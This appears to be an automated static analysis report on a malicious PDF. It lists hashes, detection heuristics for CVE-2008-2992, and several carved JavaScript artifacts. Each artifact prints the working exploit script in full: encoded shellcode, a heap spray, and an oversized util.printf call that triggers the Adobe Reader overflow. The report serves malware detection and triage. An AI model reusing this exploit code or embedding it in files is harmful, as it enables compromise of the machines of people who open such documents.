Malicious PDF — malware analysis report

Static analysis result for SHA-256 c18df576d88de33c…

MALICIOUS

PDF

4.3 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 7e65994bfd2bd90b63df01d46939d687 SHA-1: f5eeef7e2c168b3417ff61f29bc1dbeae29ecf4f SHA-256: c18df576d88de33cd2618b4937f7305a07658dc76a654ea656eff08df82e6df5
268 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_UNESCAPE. The JavaScript stream, named javascript_obj0013_001.js, is obfuscated and likely intended to download and execute a second-stage payload. The presence of Scribus metadata suggests a potential vector for document creation, but the primary malicious activity is driven by the embedded script.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 7

  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13" +
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTH
    A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x3DC 2774 bytes
SHA-256: b11ae0254db1c22cd1a9cf8aa3153f4b404c1fd07c9c61394532f057d61892b8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13" +
                         "%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41" +
                         "%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8" +
                         "%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35" +
                         "%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD" +
                         "%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81" +
                         "%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA" +
                         "%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD" +
                         "%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F" +
                         "%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7" +
                         "%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466" +
                         "%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E" +
                         "%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9" +
                         "%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE" +
                         "%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9" +
                         "%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED" +
                         "%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9" +
                         "%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB" +
                         "%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7" +
                         "%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6" +
                         "%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7" +
                         "%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0" +
                         "%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57" +
                         "%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41" +
                         "%u0A23%u3914%u172A%u9742");
						 
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
javascript_obj0013_002.js pdf-javascript-stream PDF /JS object 13 at offset 0x402 3410 bytes
SHA-256: 72f95eb096db6c331b8e1cf7d4f1855d077c18fb1703fcdf18dde01b8989a05d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13" +
                         "%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41" +
                         "%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8" +
                         "%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35" +
                         "%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD" +
                         "%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81" +
                         "%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA" +
                         "%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD" +
                         "%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F" +
                         "%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7" +
                         "%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466" +
                         "%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E" +
                         "%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9" +
                         "%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE" +
                         "%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9" +
                         "%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED" +
                         "%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9" +
                         "%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB" +
                         "%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7" +
                         "%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6" +
                         "%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7" +
                         "%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0" +
                         "%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57" +
                         "%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41" +
                         "%u0A23%u3914%u172A%u9742");
						 
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f 
0000000015 00000 n 
0000000264 00000 n 
0000000282 00000 n 
0000000327 00000 n 
0000000400 00000 n 
0000000431 00000 n 
0000000451 00000 n 
0000000490 00000 n 
0000000556 00000 n 
0000000734 00000 n 
0000000784 00000 n 
0000000865 00000 n 
0000000912 00000 n 
0000006893 00000 n 
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
generic_stage_recovery_000.js deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x3DC 2021 bytes
SHA-256: b7cf4af470aa72e5fa5dcbe476d2f9b290951c6a8f22c257cd1e72c096a19fc3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41%u0A23%u3914%u172A%u9742");
						 
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
generic_stage_recovery_001.js deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x402 2657 bytes
SHA-256: 0ac7fa20ee778bcf01bc252a4bf5911f4418580b05c292e52175df92d2dce047
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41%u0A23%u3914%u172A%u9742");
						 
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f 
0000000015 00000 n 
0000000264 00000 n 
0000000282 00000 n 
0000000327 00000 n 
0000000400 00000 n 
0000000431 00000 n 
0000000451 00000 n 
0000000490 00000 n 
0000000556 00000 n 
0000000734 00000 n 
0000000784 00000 n 
0000000865 00000 n 
0000000912 00000 n 
0000006893 00000 n 
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
generic_stage_recovery_002.js deobfuscated-js generic stage recovery split-literal-normalize from combined JavaScript objects at offset 0x11 4699 bytes
SHA-256: 1993e9f40c36ecbb2d1ddd1f94d889f12e9540e53d3372ef7a373ff190f441d1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
this.lhF0pCJES29x()
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41%u0A23%u3914%u172A%u9742");
						 
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41%u0A23%u3914%u172A%u9742");
						 
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f 
0000000015 00000 n 
0000000264 00000 n 
0000000282 00000 n 
0000000327 00000 n 
0000000400 00000 n 
0000000431 00000 n 
0000000451 00000 n 
0000000490 00000 n 
0000000556 00000 n 
0000000734 00000 n 
0000000784 00000 n 
0000000865 00000 n 
0000000912 00000 n 
0000006893 00000 n 
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
combined_document_js_000.js deobfuscated-js combined document JavaScript streams at offset 0x11 6205 bytes
SHA-256: fafc0edc5b43e14970a0c125572e69594a25147110673ccfd89fb12c865e8d68
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
this.lhF0pCJES29x()
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13" +
                         "%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41" +
                         "%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8" +
                         "%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35" +
                         "%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD" +
                         "%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81" +
                         "%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA" +
                         "%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD" +
                         "%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F" +
                         "%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7" +
                         "%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466" +
                         "%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E" +
                         "%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9" +
                         "%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE" +
                         "%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9" +
                         "%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED" +
                         "%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9" +
                         "%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB" +
                         "%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7" +
                         "%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6" +
                         "%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7" +
                         "%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0" +
                         "%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57" +
                         "%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41" +
                         "%u0A23%u3914%u172A%u9742");
						 
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
zFHYxkRYCwD2=unescape("%uC92B%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u4F13" +
                         "%u276F%u8317%uFCEB%uF4E2%u7FA4%u5D7D%uA67C%uAE41" +
                         "%u6E73%u23A7%uF645%uEDC5%u6AA4%uFCCF%u90B0%u67D8" +
